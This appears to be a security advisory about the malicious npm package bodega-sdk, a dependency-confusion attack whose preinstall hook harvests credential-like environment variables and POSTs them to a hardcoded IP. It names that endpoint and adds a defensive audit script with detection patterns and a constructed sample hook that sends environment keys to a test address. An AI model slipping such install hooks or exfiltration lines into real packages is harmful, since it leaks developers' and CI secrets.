
MAL-2026-5801

Malicious code in bodega-sdk (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (75aea05ceba339fbc9f0764e178d0cac8170219115218d635b14639ec01410a4)

package.json declares `preinstall: node index.js`, which fires automatically on `npm install`. index.js collects host identifiers (os.hostname(), os.userInfo().username, cwd) and enumerates process.env, filtering keys by the regex /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i to capture credential-shaped values (API keys, seed phrases, mnemonics, private keys, Telegram bot tokens, Blockfrost keys, Redis URLs, batcher keys). The harvested JSON is POSTed to https://2.25.140.71:8443/surflending/npm-confusion — a hardcoded bare-IP endpoint. The attacker-chosen URL path `/surflending/npm-confusion` and the sentinel version 9.9.9 indicate a dependency-confusion attack targeting a private `bodega-sdk` package (likely SurfLending/Bodega DEX on Cardano): any organization with an internal package of this name risks the public copy resolving on install, leaking credentials from CI runners and developer machines unconditionally.
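As an added example (not code from this advisory, from Amazon Inspector, or from any bodega-sdk maintainer), the Node.js script below turns the indicators described above into a heuristic audit a reviewer could run over a downloaded tarball's package.json and hook script: an install-time lifecycle hook, enumeration of process.env, host fingerprinting, a network call, and a hardcoded bare-IP URL. The package name, script text and IP address in the sample are constructed, and the function names (`installHooks`, `scriptIndicators`, `auditPackage`) are assumptions of this example.

```javascript
// Added example, not part of this advisory or of Amazon Inspector's tooling:
// a heuristic audit for the behaviours described above. All inputs are
// constructed; the IP address is from the TEST-NET-3 documentation range.

// Lifecycle scripts npm runs when a package is installed as a dependency.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// http(s) URL whose host is a literal IPv4 address, e.g. https://203.0.113.5:8443/p
const BARE_IP_URL = /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:\/[^\s'"`)]*)?/g;

// Return the install-time hooks a parsed package.json declares.
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Scan a script body for the indicators the advisory describes.
function scriptIndicators(source) {
  const indicators = [];
  if (/Object\.(?:keys|entries)\(\s*process\.env|for\s*\([^)]*\bin\s+process\.env/.test(source)) {
    indicators.push('env-enumeration');
  }
  if (/\bos\.(?:hostname|userInfo)\(\)/.test(source)) {
    indicators.push('host-fingerprint');
  }
  const urls = source.match(BARE_IP_URL) || [];
  if (urls.length > 0) {
    indicators.push('bare-ip-endpoint');
  }
  if (/\b(?:fetch|https?\.request|https?\.get|axios)\b/.test(source)) {
    indicators.push('network-call');
  }
  return { indicators, urls };
}

// Audit a package: pkg is the parsed package.json, scriptSources maps file
// names to their text (what a reviewer reads out of the extracted tarball).
function auditPackage(pkg, scriptSources) {
  const hooks = installHooks(pkg);
  const findings = hooks.map(({ hook, command }) => {
    // Pick the first .js file the hook command references, if any.
    const match = command.match(/([\w./-]+\.js)\b/);
    const file = match ? match[1].replace(/^\.\//, '') : null;
    const source = file && scriptSources[file] ? scriptSources[file] : '';
    return { hook, command, file, ...scriptIndicators(source) };
  });
  // Credential enumeration combined with an outbound call is the exfil shape.
  const exfilShaped = findings.some(
    (f) =>
      f.indicators.includes('env-enumeration') &&
      (f.indicators.includes('network-call') || f.indicators.includes('bare-ip-endpoint'))
  );
  const verdict = exfilShaped ? 'suspicious' : hooks.length > 0 ? 'review' : 'clean';
  return { verdict, findings };
}

// Constructed sample inputs: a package with a preinstall hook and a hook
// script that carries the indicators (not a working copy of the malware).
const SAMPLE_PKG = {
  name: 'example-sdk',
  version: '9.9.9',
  scripts: { preinstall: 'node index.js' },
};
const SAMPLE_INDEX_JS = [
  "const os = require('os');",
  "const https = require('https');",
  'const payload = { host: os.hostname(), env: Object.keys(process.env) };',
  "https.request('https://203.0.113.5:8443/collect', { method: 'POST' }).end(JSON.stringify(payload));",
].join('\n');

// Expected verdict: 'suspicious', with all four indicators on the preinstall hook.
console.log(JSON.stringify(auditPackage(SAMPLE_PKG, { 'index.js': SAMPLE_INDEX_JS }), null, 2));
```

The regexes are deliberately narrow, so a miss is not a clean bill of health; the point is to surface packages that deserve a manual read before they reach a CI runner. The install-time exposure itself is reduced by `npm install --ignore-scripts` and, for the dependency-confusion vector, by publishing internal packages under a scope that `.npmrc` maps to the internal registry (`@myorg:registry=https://...`, with `myorg` standing in for the real scope) so that an unscoped public name cannot shadow them.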

Is this version affected?


Affected package

npm / bodega-sdk

No fixed version published yet for bodega-sdk (npm). Pin to a known-safe version or switch to an alternative.
